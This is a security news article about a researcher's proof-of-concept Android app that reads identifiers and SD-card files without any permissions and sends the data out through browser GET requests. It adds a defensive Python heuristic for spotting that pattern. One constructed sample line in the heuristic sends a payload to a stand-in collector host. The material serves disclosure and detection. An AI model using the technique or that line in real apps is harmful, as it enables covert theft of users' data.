When installing new apps on an Android device, users are asked to give their permission for specific actions that an app must be able to perform in order to function properly.
As we already know, the “permission” security model mostly fails to protect users because many of them aren’t prepared to give up on installing a particular app even though the permissions it asks for could be exploited for data exfiltration and other, even more malicious goals.
But what about apps that don’t ask for any permission? What (if anything) are they able to access and exfiltrate?
The question was answered by Leviathan Security researcher Paul Brodeur, who developed a proof-of-concept app he dubbed “No Permissions”.
By testing it on a number of devices and an Android emulator, he discovered that the app could access and grab identifiable information (GSM & SIM vendor IDs, kernel version and name of custom ROM installed, Android ID), access a list of apps installed on the device, as well as readable files belonging to them, and access the device’s SD card and fetch all non-hidden files on it.
“It’s worth noting that even though the Android developer docs state that there’s no security enforced upon files stored on external storage, many things are stored on the SD Card, including photos, backups, and any external configuration files — on my own device, I found that OpenVPN certificates were stored on the SD card (which I promptly corrected!)” he pointed out.
So, all this data can be accessed and grabbed by the app, but can it be transmitted to a remote location? Brodeur says yes.
By using an ACTION_VIEW Intent with a URI as its network access call – which can be made without permissions – the app can open a browser and pass the data to it via GET parameters in the URI, and transmit large amounts of data by creating additional browser calls.
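A review-side heuristic for the channel described above, as an added example that is not from the original article or from Brodeur's app: it flags an app whose manifest lacks the INTERNET permission but whose decompiled source hands a run-time-built URI to an ACTION_VIEW Intent. The manifests, Java lines, collector.example host and function names are constructed for illustration, and the regex assumes the Intent and Uri.parse() call sit on one line.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
INTERNET = "android.permission.INTERNET"
# ACTION_VIEW intent whose Uri.parse() argument is captured for inspection.
VIEW_CALL = re.compile(r"Intent\.ACTION_VIEW\s*,\s*Uri\.parse\(([^)]*)\)")
LITERAL = re.compile(r'\s*"[^"]*"\s*')  # a single fixed string, nothing appended

# Constructed sample inputs for illustration (not taken from any real app).
MANIFEST_NO_PERMS = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample"><application/></manifest>"""
MANIFEST_WITH_INTERNET = MANIFEST_NO_PERMS.replace(
    "<application/>",
    '<uses-permission android:name="android.permission.INTERNET"/><application/>')
SOURCE_DYNAMIC = '''
String u = "http://collector.example/?d=" + payload;
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse(u)));
'''
SOURCE_STATIC = '''
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("https://example.com/help")));
'''

def declared_permissions(manifest_xml):
    """Return the set of <uses-permission> names in an AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    names = (e.get(ANDROID_NS + "name") for e in root.iter("uses-permission"))
    return {n for n in names if n}

def dynamic_view_intents(java_source):
    """List (line number, line) where ACTION_VIEW opens a URI built at run time."""
    hits = []
    for lineno, line in enumerate(java_source.splitlines(), 1):
        m = VIEW_CALL.search(line)
        if m and not LITERAL.fullmatch(m.group(1)):
            hits.append((lineno, line.strip()))
    return hits

def triage(manifest_xml, java_source):
    """Flag apps that lack INTERNET yet hand run-time-built URIs to the browser."""
    perms = declared_permissions(manifest_xml)
    hits = dynamic_view_intents(java_source)
    return {"permissions": sorted(perms), "hits": hits,
            "flag": bool(hits) and INTERNET not in perms}

if __name__ == "__main__":
    print(triage(MANIFEST_NO_PERMS, SOURCE_DYNAMIC))
```

A hit is a lead for manual review, not a verdict: many legitimate apps open run-time-built links in the browser.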
Brodeur is not the first to prove and point out that the Android permission model has inherent flaws, and, unfortunately, he is unlikely to be the last, but hopefully his work will take us a step closer to the moment when things will have to be changed.
For an interesting peek into Android security from the ground up and details about the flaws in its security model, I recommend reading this interview with Georgia Weidman, a penetration tester, security researcher, trainer and speaker at the upcoming HITBSecConf 2012 Amsterdam conference.